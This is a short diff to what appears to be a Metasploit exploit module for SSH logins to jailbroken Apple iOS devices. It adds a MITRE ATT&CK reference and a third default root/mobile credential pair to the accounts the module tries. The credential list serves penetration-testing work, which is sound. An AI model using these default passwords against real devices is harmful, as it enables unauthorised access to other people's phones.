@@ -26,7 +26,8 @@ class MetasploitModule < Msf::Exploit::Remote
           'hdm'
         ],
         'References' => [
-          ['OSVDB', '61284']
+          ['OSVDB', '61284'],
+          ['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH]
         ],
         'DefaultOptions' => {
           'EXITFUNC' => 'thread'
@@ -40,7 +41,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Platform' => 'unix',
         'Arch' => ARCH_CMD,
         'Targets' => [
-          ['Apple iOS', { 'accounts' => [ [ 'root', 'alpine' ], [ 'mobile', 'dottie' ]] } ],
+          ['Apple iOS', { 'accounts' => [ [ 'root', 'alpine' ], [ 'mobile', 'dottie' ], ['mobile', 'alpine'] ] } ],
         ],
         'Privileged' => true,
         'DisclosureDate' => '2007-07-02',
